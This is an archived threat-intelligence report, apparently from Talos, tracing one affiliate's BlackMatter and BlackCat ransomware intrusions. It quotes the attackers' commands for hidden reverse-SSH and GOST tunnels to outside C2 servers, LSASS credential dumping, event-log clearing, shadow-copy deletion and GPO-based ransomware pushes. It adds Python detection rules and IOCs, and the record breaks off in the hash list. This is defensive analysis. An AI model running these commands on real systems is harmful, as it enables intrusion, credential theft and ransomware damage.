{
	"id": "a26f9aeb-1ad8-4c12-b9cf-299999800e77",
	"created_at": "2026-04-06T00:16:03.312943Z",
	"updated_at": "2026-04-10T03:29:40.11653Z",
	"deleted_at": null,
	"sha1_hash": "4a288f83b64e007445b90bd303be7bc5d9751d68",
	"title": "From BlackMatter to BlackCat: Analyzing two attacks from one affiliate",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 635462,
	"plain_text": "From BlackMatter to BlackCat: Analyzing two attacks from one\r\naffiliate\r\nBy Tiago Pereira\r\nPublished: 2022-03-17 · Archived: 2026-04-05 19:16:40 UTC\r\nBlackCat is a recent and growing ransomware-as-a-service (RaaS) group that targeted several organizations\r\nworldwide over the past few months.\r\nThere are rumors of a relationship between BlackCat and the BlackMatter/DarkSide ransomware groups,\r\ninfamous for attacking the Colonial Pipeline last year. According to a BlackCat representative, BlackCat is\r\nnot a rebranding of BlackMatter, but its team is made up of affiliates of other RaaS groups (including\r\nBlackMatter).\r\nTalos has observed that at least one attacker that used BlackMatter was likely one of the early adopters of\r\nBlackCat. In this post, we'll describe these attacks and the relationship between them.\r\nUnderstanding the techniques and tools used by RaaS affiliates helps organizations detect and prevent\r\nattacks before the ransomware itself is executed, at which point every second means lost data.\r\nBlackCat ransomware, also known as \"ALPHV,\" has quickly gained notoriety for being used in double-extortion\r\nattacks (file encryption plus the threat of publishing stolen files) against companies. It first appeared in November 2021 and,\r\nsince then, several companies have been hit across the globe. However, more than 30 percent of the compromises\r\nhappened to U.S.-based companies.\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 1 of 12\n\nSeveral security companies have noticed a connection between the BlackCat, BlackMatter and DarkSide\r\nransomware groups. 
Recently, in a Recorded Future interview with a BlackCat representative, the representative\r\nconfirmed that there was a connection, but no rebranding or other direct relationship.\r\nThe BlackCat representative explained that the operators are instead affiliates of other RaaS operations and the\r\nactors built upon a foundation of their previous knowledge gained as part of other groups. Affiliates in this context\r\nare the groups that compromise companies' networks and deploy the ransomware provided by the RaaS operators.\r\nIf this is true, BlackCat seems to be a case of vertical business expansion. In essence, it's a way to control the\r\nupstream supply chain by making a service that is key to their business (the RaaS operator) better suited for their\r\nneeds and adding another source of revenue.\r\nVertical expansion is also a common business strategy when there is a lack of trust in the supply chain. There are\r\nseveral cases of vulnerabilities in ransomware encryption, and even of backdoors, that can explain a lack of trust in\r\nRaaS. One particular case mentioned by the BlackCat representative was a flaw in DarkSide/BlackMatter\r\nransomware allowing victims to decrypt their files without paying the ransom. Victims used this vulnerability for\r\nseveral months, resulting in big losses for affiliates.\r\nBlackCat/BlackMatter connection\r\nWhile researching a BlackCat ransomware attack from December 2021, we observed a domain (and its IP\r\naddresses) used to maintain persistent access to the network. This domain had also been used in a BlackMatter\r\nattack in September 2021. Further analysis revealed more commonalities, such as tools, file names and techniques\r\nthat were common to both ransomware variants.\r\nAffiliates are responsible for compromising systems and deploying ransomware, so it is likely that attacks carried\r\nout by the same ransomware family may differ in techniques and procedures. 
On the other hand, RaaS operators\r\nare known to make training materials and general techniques and tools available to their affiliates, like the leaked\r\nConti ransomware playbook covered by Talos in a previous blog. This may explain some similarities\r\nacross affiliates.\r\nOne difference we would expect to see across RaaS affiliates is the command and control (C2) infrastructure used\r\nfor certain attacks. However, the overlapping C2 address used in the BlackMatter and BlackCat attacks leads\r\nus to assess with moderate confidence that the same affiliate was responsible for both attacks.\r\nThis connection suggests that a BlackMatter affiliate was likely an early adopter — possibly in the first month of\r\noperation — of BlackCat. This is further evidence to support the rumors that there are strong ties between\r\nBlackMatter and BlackCat.\r\nAttack details\r\nWe analyzed the actions taken by what we believe to be the same affiliate/attackers in the December BlackCat\r\nattack and a September BlackMatter attack. In terms of attack flow, the attacks were similar to other human-operated ransomware attacks: initial compromise, followed by an exploration and data exfiltration phase, then\r\nattack preparation and finally, the attack execution.\r\nThe following table summarizes the commonalities and differences in the MITRE ATT\u0026CK® framework between\r\nboth attacks:\r\nInitial access\r\nWe could not identify the initial compromise vector for the BlackCat attack. It is likely that the attack happened on\r\na system not monitored by Cisco Talos telemetry or that a previously compromised account was used to log into\r\nan exposed system.\r\nThere was evidence in the BlackMatter attack that the actor established initial access via the possible exploitation\r\nof Microsoft Exchange vulnerabilities. 
However, we could not directly tie attempts of exploiting vulnerabilities in\r\nMicrosoft Exchange to the attack and, for this reason, we assess with low confidence that the attack may have\r\nstarted with the exploitation of a vulnerability in Exchange.\r\nPersistence\r\nBeyond the access provided by the initial exploitation vector, the attackers made sure they had additional remote\r\naccess to several internal systems.\r\nDuring the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address\r\nembedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to\r\nthe C:\\ directory under the file names system, windows or cachetask.\r\nIt was also hidden by copying its contents into an alternate data stream (ADS) named cachetask attached to the C:\\ directory itself, so no ordinary file needs to remain on disk; a scheduled task running as SYSTEM every minute then launches the stream directly as c:\\:cachetask:\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command  \u0026 {(get-content c:\\system -raw | set-content c:\\ -stream 'cachetask')}\r\nc:\\windows\\system32\\schtasks.exe /create /ru system /sc minute /tn microsoft\\windows\\wininet\\cachetask /tr c:\\:cachetask -b \u003cbind port\u003e /f\r\nc:\\windows\\system32\\schtasks.exe /run /tn microsoft\\windows\\wininet\\cachetask\r\nThe Image File Execution Options Debugger registry value was another way to ensure the malicious file would be\r\npersistently executed: with Debugger set for taskmgr.exe, Windows runs c:\\system (with the original Task Manager command line appended as its arguments) every time someone starts Task Manager:\r\nc:\\windows\\system32\\reg.exe add hklm\\software\\microsoft\\windows nt\\currentversion\\image file execution options\\taskmgr.exe /v debugger /t reg_sz /d c:\\system\r\nDuring the BlackMatter attack, the group used a similar technique but with a different tool: GO Simple Tunnel\r\n(GOST). GOST is a Go-based tunneling tool; here it was used to start a local SOCKS5 proxy (127.0.0.1:3388) and expose it to an attacker-controlled C2 server through a reverse TCP tunnel (rtcp) carried over mwss, GOST's multiplexed WebSocket-over-TLS transport, on port 443. This C2 server is the same that was used in the BlackCat attack. 
The name used for the\r\ndeployed GOST file was \"system.exe\", similar to the file name used in the BlackCat attack for reverse-ssh. Four hourly scheduled tasks were created, in two pairs: in each pair one task starts the local SOCKS5 listener on 127.0.0.1:3388 and the other forwards that listener to the C2 server (rtcp port 1116 and 1117 respectively, over mwss on port 443). The task names, windows wsus update and windows defender, were chosen to blend in.\r\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\\windows\\temp\\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f\r\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\\windows\\temp\\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f\r\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\\windows\\temp\\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f\r\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\\windows\\temp\\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f\r\nThe same C2 domain was used in both attacks:\r\nDefense evasion\r\nDuring the BlackCat attack, logs were disabled on several systems to avoid detection. For example, before setting\r\nup the reverse-ssh scheduled task, the attackers disabled the Task Scheduler operational log (a full list of disabled logs is\r\nprovided in the IOC section below).\r\nc:\\windows\\system32\\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false\r\nThe anti-rootkit tool GMER was loaded into a small number of key systems. 
We believe the attackers used this to\r\ndisable endpoint protection.\r\nc:\\users\\\u003cusername\u003e\\downloads\\gmer\\gmer.exe\r\nCredential access\r\nLocal and domain user credentials were collected on a few key systems by dumping the memory of the LSASS process with Sysinternals ProcDump and with Dumpert (Outflank's LSASS dumper, which uses direct system calls to sidestep user-mode API hooks), then extracting credentials from the dumps offline:\r\nc:\\windows\\system\\procdump.exe -accepteula -ma lsass.exe lsass.dmp\r\nc:\\windows\\system\\dumpert.exe lsass.exe\r\nDuring the BlackMatter attack, the attacker used the MiniDump export of comsvcs.dll directly, via rundll32, to write a full dump of the LSASS process (a living-off-the-land technique that needs no additional tooling):\r\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll, minidump (get-process lsass).id c:\\temp\\lsass.dmp full\r\nBeyond the Windows login credentials, during the BlackCat attack, the attackers used a tool named \"steal.exe\" to\r\nharvest additional data. We could not obtain the binary, but based on the creation of a results folder with an\r\n\"archive.zip\" file inside it, we believe the tool may be HackBrowserData, or a version of it.\r\nThe following commands were used on a few systems (each issued through wmiexec, hence the loopback ADMIN$ output redirection):\r\ncmd.exe /q /c steal.exe 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\ncmd.exe /q /c cd results 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\ncmd.exe /q /c dir 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\ncmd.exe /q /c del archive.zip 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\ncmd.exe /q /c del c:\\steal.exe 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\nDiscovery\r\nDuring the BlackCat attack, we observed network scanning and reconnaissance using SoftPerfect Network Scanner.\r\nThis tool has many features beyond simple network scanning and was probably a valuable tool in understanding\r\nsystem roles and network infrastructure 
and possible lateral movement paths. The following commands show this tool\r\nin use. Notice that the executable was renamed svchost.exe and placed under c:\\programdata\\system so that it blends into the system's regular\r\nprocesses:\r\ncmd.exe /c c:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255\r\nc:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255\r\ncmd.exe /c c:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255\r\nADRecon was also used to collect information from Active Directory and its key servers.\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\adrecon.ps1\r\nDuring the BlackMatter attack, the attackers also searched for additional ways to maintain access. For example,\r\nthe following commands show the attackers exploring an existing TeamViewer installation (quoting reproduced as captured):\r\ncmd.exe /q /c teamviewer.exe --getid\r\ncmd.exe /q /c dir c:\\\"program files\r\ncmd.exe /q /c dir c:\\\"program files (x86) 1\r\ncmd.exe /q /c dir c:\\\"program files (x86)\\teamviewer\\\r\ncmd.exe /q /c c:\\\"program files (x86)\\teamviewer\\teamviewer.exe --getid\r\ncmd.exe /q /c c:\\\"program files (x86)\\teamviewer\\teamviewer.exe -info\r\nThe following commands show the attackers exploring the KeePass password manager configuration:\r\ncmd.exe /q /c dir c:\\\"program files (x86)\\\r\ncmd.exe /q /c dir c:\\\"program files (x86)\"keepass password safe 2\\\r\ncmd.exe /q /c type c:\\\"program files (x86)\"keepass password safe 2\\keepass.exe.config\r\nLateral movement\r\nWe observed lateral movement using three main tools and techniques: Impacket's wmiexec, PowerShell over the WinRM service, and Microsoft Remote Desktop.\r\nImpacket's wmiexec provides a semi-interactive shell on remote systems that expose WMI over DCOM (TCP 135 plus a dynamic RPC port) to an account with local administrator rights. We observed its use\r\nin both the BlackCat and BlackMatter attacks. 
This tool's activity can be detected by looking for processes created by WmiPrvSE.exe (the WMI provider host) whose command line ends with the following string, wmiexec's default redirection of output to the target's own ADMIN$ share:\r\n1\u003e \\\\127.0.0.1\\admin$\\__\u003ctimestamp\u003e.\u003c6 digits\u003e 2\u003e\u00261\r\nThis tool was often used to issue a command that allows inbound WinRM connections (TCP 5985, WinRM over HTTP) through the Windows firewall,\r\npossibly for the convenience of using some prepared scripts:\r\ncmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1\u003e \\\\127.0.0.1\\c$\\windows\\temp\\qaiumg 2\u003e\u00261\r\nWinRM allows attackers to use PowerShell to execute commands on remote machines. This activity can be detected\r\nby searching for processes started by \"wsmprovhost.exe\", the WinRM plugin host that runs remote PowerShell sessions. Below are a few examples of WinRM being used\r\nfor lateral movement, in this case to disable logging of many Windows services:\r\nc:\\windows\\system32\\wevtutil.exe set-log active directory web services /enabled:false\r\nc:\\windows\\system32\\wevtutil.exe set-log application /enabled:false\r\nc:\\windows\\system32\\wevtutil.exe set-log hardwareevents /enabled:false\r\nc:\\windows\\system32\\wevtutil.exe set-log internet explorer /enabled:false\r\nMicrosoft Remote Desktop was also used by the attackers to obtain GUI access to systems. 
Before those RDP sessions, the following command was issued through Impacket's wmiexec; it sets DisableRestrictedAdmin to 0, which enables Restricted Admin mode for RDP and lets the attacker log on over RDP with only an NTLM hash (pass-the-hash) instead of a cleartext password:\r\ncmd.exe /q /c reg add hkey_local_machine\\system\\currentcontrolset\\control\\lsa /v disablerestrictedadmin /t reg_dword /d 0 1\u003e \\\\127.0.0.1\\admin$\\__\u003ctimestamp\u003e.\u003cnum\u003e 2\u003e\u00261\r\nOther lateral movement techniques observed include PsExec in both attacks and RemCom, an open-source\r\nPsExec equivalent, during the BlackMatter attack.\r\nCommand and control\r\nAn apparent OPSEC mistake revealed the operator's platform: the attacker typed their own shell's upload and download commands (#upload and #download, with a /home/kali/desktop destination) into the remote command channel, where they were passed to cmd.exe and logged:\r\ncmd.exe /q /c #upload c:\\users\\\u003cuser\u003e\\documents\\\u003cdoc\u003e /home/kali/desktop/\u003cdoc\u003e 1\u003e \\\\127.0.0.1\\admin$\\\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\ncmd.exe /q /c #download c:\\users\\\u003cuser\u003e\\documents\\\u003cdoc\u003e /home/kali/desktop/\u003cdoc\u003e 1\u003e \\\\127.0.0.1\\admin$\\\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\nIt is unlikely that the attackers had a Kali Linux installation inside the victim's network, so remote control of the\r\nsystems was likely achieved through the SSH tunnels described earlier.\r\nExfiltration\r\nAlthough we observed a suspiciously large number of documents opened and screenshots taken on one of the\r\ncompromised systems, we did not identify the techniques used to exfiltrate data from the network. It is possible that\r\ndocument exfiltration is carried out by the execution of upload/download commands similar to the ones listed\r\nabove.\r\nImpact\r\nIn both attacks, before the actual execution of the ransomware, the attackers performed several actions preparing\r\nsystems to make the execution as successful as possible.\r\n
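The precursor activity described so far (persistence, defense evasion, credential access and lateral movement) is where an attack like this has to be caught, and every command listed above was visible in process-creation telemetry. The following Python is an added example written for this page, not code from Talos or from the post: it encodes the observed command-line patterns (the wmiexec loopback ADMIN$ redirection and WmiPrvSE.exe parent, wsmprovhost.exe as parent for WinRM, wevtutil set-log /enabled:false and the wevtutil cl loop, the netsh rule for TCP 5985, the comsvcs.dll MiniDump and ProcDump LSASS dumps, the IFEO Debugger value, a SYSTEM scheduled task whose action is an alternate data stream on the C:\\ directory, and DisableRestrictedAdmin set to 0) as rules and runs them over constructed process-creation events in the shape of Sysmon Event ID 1 or Security event 4688. Host names, the LSASS PID, the bind port and the timestamp-like file names in the sample events are invented.

```python
import re
from typing import Callable, NamedTuple


# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 shape). Not Talos telemetry.
class ProcEvent(NamedTuple):
    host: str
    parent_image: str
    image: str
    command_line: str


# wmiexec.py default: stdout/stderr redirected to the loopback ADMIN$ share as __<timestamp>.<6 digits>
WMIEXEC_REDIRECT = re.compile(r'1> \\\\127[.]0[.]0[.]1\\admin[$]\\__[0-9]+[.][0-9]+ 2>&1$')
# Looser variant: output redirected into any loopback administrative share (e.g. C$\windows\temp\<name>)
LOOPBACK_REDIRECT = re.compile(r'1> \\\\127[.]0[.]0[.]1\\[a-z]+[$]\\.* 2>&1$')


def _has(cl: str, *needles: str) -> bool:
    return all(n in cl for n in needles)


# rule name -> predicate over (lower-cased parent image, lower-cased command line)
RULES: dict[str, Callable[[str, str], bool]] = {
    'wmiexec_default_redirect': lambda p, cl: WMIEXEC_REDIRECT.search(cl) is not None,
    'loopback_share_redirect': lambda p, cl: LOOPBACK_REDIRECT.search(cl) is not None,
    'spawned_by_wmiprvse': lambda p, cl: p.endswith('wmiprvse.exe'),
    'spawned_by_wsmprovhost': lambda p, cl: p.endswith('wsmprovhost.exe'),
    'eventlog_disabled': lambda p, cl: _has(cl, 'wevtutil', 'set-log', '/enabled:false'),
    'eventlog_cleared_loop': lambda p, cl: _has(cl, 'wevtutil.exe el', 'wevtutil.exe cl'),
    'winrm_firewall_opened': lambda p, cl: _has(cl, 'netsh', 'advfirewall', 'localport=5985'),
    'lsass_dump_comsvcs': lambda p, cl: _has(cl, 'comsvcs.dll', 'minidump'),
    'lsass_dump_procdump': lambda p, cl: _has(cl, 'procdump', '-ma', 'lsass'),
    'ifeo_debugger_set': lambda p, cl: _has(cl, 'image file execution options', '/v debugger'),
    # task action is a stream on the C:\ directory itself (c:\:<stream>), the reverse-ssh trick
    'schtasks_system_ads_target': lambda p, cl: _has(cl, 'schtasks', '/ru system', '/tr c:\\:'),
    'restricted_admin_enabled': lambda p, cl: _has(cl, 'disablerestrictedadmin', '/d 0'),
}


def triage(events: list[ProcEvent]) -> list[tuple[str, str, str]]:
    '''Return one (host, rule, command_line) tuple per rule that each event trips.'''
    hits = []
    for e in events:
        parent, cl = e.parent_image.lower(), e.command_line.lower()
        for name, pred in RULES.items():
            if pred(parent, cl):
                hits.append((e.host, name, e.command_line))
    return hits


def rules_per_host(hits: list[tuple[str, str, str]]) -> dict[str, set[str]]:
    '''Collapse hits to the set of distinct rules per host: one rule alone may be admin noise,
    several of these on one host in a short period is the pre-encryption pattern to escalate.'''
    out: dict[str, set[str]] = {}
    for host, rule, _ in hits:
        out.setdefault(host, set()).add(rule)
    return out


# Constructed sample events; hosts, PID 712, bind port 2222 and the timestamps are invented.
SAMPLE_EVENTS = [
    ProcEvent('FS01', 'c:\\windows\\system32\\wbem\\wmiprvse.exe', 'c:\\windows\\system32\\cmd.exe',
              'cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp '
              'localport=5985 action=permit 1> \\\\127.0.0.1\\c$\\windows\\temp\\qaiumg 2>&1'),
    ProcEvent('FS01', 'c:\\windows\\system32\\wbem\\wmiprvse.exe', 'c:\\windows\\system32\\cmd.exe',
              'cmd.exe /q /c whoami 1> \\\\127.0.0.1\\admin$\\__1638360000.123456 2>&1'),
    ProcEvent('FS01', 'c:\\windows\\system32\\wsmprovhost.exe', 'c:\\windows\\system32\\wevtutil.exe',
              'c:\\windows\\system32\\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false'),
    ProcEvent('FS01', 'c:\\windows\\system32\\cmd.exe', 'c:\\windows\\system32\\schtasks.exe',
              'c:\\windows\\system32\\schtasks.exe /create /ru system /sc minute '
              '/tn microsoft\\windows\\wininet\\cachetask /tr c:\\:cachetask -b 2222 /f'),
    ProcEvent('DC01', 'c:\\windows\\system32\\wbem\\wmiprvse.exe', 'c:\\windows\\system32\\cmd.exe',
              'cmd.exe /q /c reg add hkey_local_machine\\system\\currentcontrolset\\control\\lsa '
              '/v disablerestrictedadmin /t reg_dword /d 0 1> \\\\127.0.0.1\\admin$\\__1638360100.654321 2>&1'),
    ProcEvent('WS07', 'c:\\windows\\system32\\cmd.exe', 'c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe',
              'powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll, minidump 712 c:\\temp\\lsass.dmp full'),
    ProcEvent('WS07', 'c:\\windows\\system32\\cmd.exe', 'c:\\windows\\system32\\cmd.exe',
              '''cmd.exe /c for /f %1 in ('wevtutil.exe el') do wevtutil.exe cl %1'''),
    ProcEvent('WS07', 'c:\\windows\\explorer.exe', 'c:\\windows\\system32\\notepad.exe',
              'notepad.exe c:\\users\\alice\\notes.txt'),  # benign control event
]

if __name__ == '__main__':
    for host, rules in sorted(rules_per_host(triage(SAMPLE_EVENTS)).items()):
        print(host, sorted(rules))
```

Run it with python3. The regexes are anchored on the end of the command line because wmiexec appends the redirection last; the looser loopback rule also catches the netsh command above, whose output went to C$ rather than ADMIN$.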
On the day of the attack, the attacker logged in to the\r\ndomain controller and opened the Group Policy Management console. The attackers then dropped and executed a\r\nfile named \"apply.ps1.\" We believe this script created and prepared the group policy object that causes the execution of the\r\nransomware throughout the domain.\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\apply.ps1\r\nThis execution results in the immediate writing of group policy files to disk and is followed by the following command, which forces an immediate policy refresh (on the domain controller itself; domain members pick up the new policy at their next refresh, startup or logon unless refreshed remotely):\r\ncmd.exe /q /c gpupdate /force\r\nA few minutes before BlackCat ransomware started encrypting files, the attackers executed a script called\r\n\"defender.vbs\" from the NETLOGON share of a domain controller:\r\ncmd.exe /c \\\\\u003cdomaincontroller\u003e\\netlogon\\defender.vbs\r\nIn the BlackMatter attack, the same file (same hash, listed under the common IOCs below) was named \"def.vbs\" and executed minutes before the encryption\r\nbegan:\r\ncmd.exe /c \\\\\u003cdomaincontroller\u003e\\netlogon\\def.vbs\r\nWe believe this is part of the attack, but at this time do not know the exact role of this script.\r\nWhen encryption begins, the ransomware file, named \u003cnum\u003e.exe in the BlackCat attack and, similarly, \u003cnum\u003e.exe\r\nin the BlackMatter attack, had been dropped into the SYSVOL folder on the domain controllers, making it accessible to every user in the domain through the\r\nNETLOGON network share.\r\n
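The GPO push and the NETLOGON-hosted payload give a second, complementary detection point: a file on a domain controller's NETLOGON share suddenly executing on many hosts within minutes, preceded on the domain controller by a script run under powershell -exec bypass and a gpupdate /force. The following Python is an added example for this page, not code from Talos or from the post. The hosts, timestamps, the payload name 7f3a.exe and the token value in the sample timeline are constructed; the access-token check relies on the fact that BlackCat samples require an --access-token argument to run.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple


# Constructed process-creation events (timestamp, host, command line); not Talos telemetry.
class ProcEvent(NamedTuple):
    ts: datetime
    host: str
    command_line: str


# Anything launched straight off a domain controller's NETLOGON share: \\<dc>\netlogon\<file>
NETLOGON_EXEC = re.compile(r'\\\\(?P<dc>[a-z0-9._-]+)\\netlogon\\(?P<file>[^ ]+)', re.IGNORECASE)


def netlogon_fanout(events, window=timedelta(minutes=10), min_hosts=5):
    '''One alert per NETLOGON-hosted file that ran on at least min_hosts distinct hosts inside a
    single window. A GPO-pushed payload looks exactly like this; a logon script on a few hosts does not.'''
    runs = defaultdict(list)
    for e in events:
        m = NETLOGON_EXEC.search(e.command_line)
        if m:
            runs[(m['dc'].lower(), m['file'].lower())].append(e)
    alerts = []
    for (dc, name), evs in runs.items():
        evs.sort(key=lambda e: e.ts)
        for i, first in enumerate(evs):
            burst = [e for e in evs[i:] if e.ts - first.ts <= window]
            hosts = {e.host for e in burst}
            if len(hosts) >= min_hosts:
                alerts.append({'dc': dc, 'file': name, 'hosts': len(hosts),
                               'first': first.ts, 'last': burst[-1].ts,
                               # BlackCat binaries need --access-token to run, so its presence is a strong tell
                               'access_token': any('--access-token' in e.command_line for e in burst)})
                break  # one alert per file
    return alerts


def gpo_push_precursor(events, window=timedelta(minutes=15)):
    '''Hosts where a .ps1 ran under powershell -exec bypass and gpupdate /force followed within window,
    the sequence the post describes on the domain controller (apply.ps1, then gpupdate /force).'''
    by_host = defaultdict(list)
    for e in events:
        by_host[e.host].append(e)
    flagged = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        script_times = [e.ts for e in evs
                        if '-exec bypass' in e.command_line.lower() and '.ps1' in e.command_line.lower()]
        for e in evs:
            cl = e.command_line.lower()
            if 'gpupdate' in cl and '/force' in cl and any(timedelta(0) <= e.ts - t <= window for t in script_times):
                flagged.append((host, e.ts))
                break
    return flagged


T0 = datetime(2022, 1, 1, 2, 0, 0)  # arbitrary constructed timeline
SAMPLE_EVENTS = [
    ProcEvent(T0 - timedelta(days=3), 'WS01', 'cmd.exe /c \\\\DC01\\netlogon\\logon.bat'),  # ordinary logon script
    ProcEvent(T0 - timedelta(days=1), 'WS02', 'cmd.exe /q /c gpupdate /force'),  # admin refresh, no script before it
    ProcEvent(T0, 'DC01', 'c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\apply.ps1'),
    ProcEvent(T0 + timedelta(minutes=1), 'DC01', 'cmd.exe /q /c gpupdate /force'),
]
for i in range(8):  # the GPO fires on eight workstations within about a minute
    SAMPLE_EVENTS.append(ProcEvent(T0 + timedelta(minutes=5, seconds=10 * i), f'WS0{i}',
                                   'cmd.exe /c \\\\DC01\\netlogon\\defender.vbs'))
    SAMPLE_EVENTS.append(ProcEvent(T0 + timedelta(minutes=9, seconds=10 * i), f'WS0{i}',
                                   'cmd.exe /c \\\\DC01\\netlogon\\7f3a.exe --access-token 0123456789abcdef'))

if __name__ == '__main__':
    print('precursor:', gpo_push_precursor(SAMPLE_EVENTS))
    for a in netlogon_fanout(SAMPLE_EVENTS):
        print('fan-out:', a)
```

The thresholds (five hosts in ten minutes, gpupdate within fifteen minutes of a bypass-policy script) are assumptions for the sample; tune them to the size of the domain. The fan-out rule fires on defender.vbs minutes before the encryptor itself runs, which is the last point at which isolating the domain controller still prevents most of the damage.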
The group policy then makes every domain-joined system execute the file from that share.\r\nBlackCat attack:\r\ncmd.exe -c \\\\\u003cdomain controller\u003e\\netlogon\\\u003cnum\u003e.exe --access-token \u003ctoken\u003e\r\nBlackMatter attack:\r\ncmd.exe -c \\\\\u003cdomain controller\u003e\\netlogon\\\u003cnum\u003e.exe\r\nThe following variations of the BlackCat command were observed. The --access-token argument is mandatory: BlackCat binaries refuse to run without the per-victim token, which keeps the sample from detonating in a sandbox or an analyst's VM. The --propagated and --child flags mark instances the encryptor launched on other hosts or as child processes, --no-prop-servers excludes the listed servers from propagation, -p restricts encryption to the given paths and -v enables verbose output:\r\n\u003cnum\u003e.exe --access-token \u003ctoken\u003e /f\r\n\u003cnum\u003e.exe --access-token \u003ctoken\u003e --no-prop-servers \\\\\u003chostname\u003e --propagated\r\n\u003cnum\u003e.exe -access-token \u003ctoken\u003e -v -p \\\\\u003chostname\u003e\\scans\r\n\u003cnum\u003e.exe --access-token \u003ctoken\u003e\r\n\u003cnum\u003e.exe --child --access-token \u003ctoken\u003e\r\n\u003cnum\u003e.exe -access-token \u003ctoken\u003e -v -p .\r\nThe BlackCat executable ran further commands to make its execution more effective:\r\nc:\\windows\\system32\\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1\r\nc:\\windows\\system32\\cmd.exe /c reg add hkey_local_machine\\system\\currentcontrolset\\services\\lanmanserver\\parameters /v maxmpxct /d 65535 /t reg_dword /f\r\nc:\\windows\\system32\\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1\r\nc:\\windows\\system32\\cmd.exe /c vssadmin.exe delete shadows /all /quiet\r\nc:\\windows\\system32\\cmd.exe /c wmic.exe shadowcopy delete\r\nc:\\windows\\system32\\cmd.exe /c arp -a\r\nc:\\windows\\system32\\cmd.exe /c bcdedit /set {default}\r\nc:\\windows\\system32\\cmd.exe /c cmd.exe /c for /f \"tokens=*\" %1 in ('wevtutil.exe el') do wevtutil.exe cl \"%1\"\r\nc:\\windows\\system32\\cmd.exe /c bcdedit /set {default} recoveryenabled no\r\nThe two fsutil commands enable evaluation of remote-to-local and remote-to-remote symbolic links so the encryptor can follow links on network shares; the MaxMpxCt value raises the number of outstanding SMB requests the server accepts per client, which speeds up encryption of shares; vssadmin and wmic delete the volume shadow copies; the for loop clears every event log wevtutil can enumerate; and bcdedit disables automatic Windows recovery (the first bcdedit command appears incomplete as captured).\r\nConclusion\r\nBlackCat first surfaced in November 2021, with the attack we described here taking place in December 2021.\r\nWhile we don't know how related BlackCat is to BlackMatter, we assess with 
moderate confidence that, based on\r\nthe tools and techniques of these attacks and overlapping infrastructure, BlackMatter affiliates were likely among\r\nthe early adopters of BlackCat.\r\nAs we have seen several times before, RaaS services come and go. Their affiliates, however, are likely to simply\r\nmove on to a new service. And with them, many of the TTPs are likely to persist.\r\nOne key aspect of these attacks is that adversaries take time exploring the environment and preparing it for a\r\nsuccessful and broad attack before launching the ransomware, at which point every second means lost data.\r\nTherefore, it is key that the attack is detected in its early stages.\r\nThe two attacks described here took over 15 days to reach the encryption stage. Knowing the attackers' tools and\r\ntechniques and having monitoring and response processes in place could have prevented the successful encryption\r\nof the companies' files.\r\nTalos will continue to monitor RaaS and their affiliates' activities and provide intelligence, detection rules and\r\nindicators to help defenders as they work to protect their networks.\r\nIOCs\r\nDomains - Common:\r\nwindows[.]menu\r\nIPs - Common:\r\n52.149.228[.]45\r\n20.46.245[.]56\r\nHashes - Common:\r\nApply.ps1\r\nD97088F9795F278BB6B732D57F42CBD725A6139AFE13E31AE832A5C947099676\r\ndefender.vbs\r\nB54DD21019AD75047CE74FE0A0E608F56769933556AED22D25F4F8B01EE0DA15\r\nHashes - BlackCat:\r\nReverse-ssh (compiled with hardcoded domain):\r\n47AFFAED55D85E1EBE29CF6784DA7E9CDBD86020DF8B2E9162A0B1A67F092DCD\r\nstealer:\r\n65DBAFE9963CB15CE3406DE50E007408DE7D12C98668DE5DA10386693AA6CD73\r\nBlackcat 